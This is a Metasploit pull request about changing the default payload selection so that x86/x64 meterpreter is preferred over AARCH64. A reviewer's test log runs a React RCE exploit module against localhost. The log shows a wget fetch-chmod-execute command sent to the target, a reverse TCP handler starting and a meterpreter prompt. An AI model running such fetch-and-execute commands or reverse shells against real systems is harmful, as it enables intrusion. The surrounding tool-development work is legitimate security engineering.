Update the payload preferences

[zeroSteiner]

This makes a change to the preferred list of payloads inspired by the exploit added in #20747. In that PR it was noticed that the payload was defaulting to AARCH64 when it wasn't specified and that's not as common of an architecture as x86 / x64. The changes in this PR will prioritize the 32-bit Windows meterpreter when it's compatible. 64-bit version of Windows always support 32-bit code execution AFAIK. The same isn't true for Linux though, so in cases where the 32-bit version of the Windows Meterpreter isn't compatible, we'll default to an x64 meterpreter for any platform.

Testing

• Use a couple of exploits and see that the automatically selected payload is reasonable. For advanced testing, you could make a mock module and toggle the different platform and architecture options to see how they affect the automatic selection.

[adfoster-r7]

React module before 🔴

msf > use multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using exploit/multi/http/react2shell_unauth_rce_cve_2025_55182
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp

React Module after 🟢

msf > use multi/http/react2shell_unauth_rce_cve_2025_55182
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp

msf exploit(multi/http/react2shell_unauth_rce_cve_2025_55182) > run rhost=127.0.0.1 rport=3001 httptrace=true lhost=192.168.124.1
[*] Command to run on remote host: wget -qO ./KLsOuZLJSzdf http://192.168.124.1:8080/BdoZk6lXmglO_p1Z1iaq8Q;chmod +x ./KLsOuZLJSzdf;./KLsOuZLJSzdf&
[*] Fetch handler listening on 192.168.124.1:8080
[*] HTTP server started
[*] Adding resource /BdoZk6lXmglO_p1Z1iaq8Q
[*] Started reverse TCP handler on 192.168.124.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable

meterpreter > 

[adfoster-r7]

Release Notes

Updates Metasploit's default payload selection logic to preference x86 payloads over AARCH64 payloads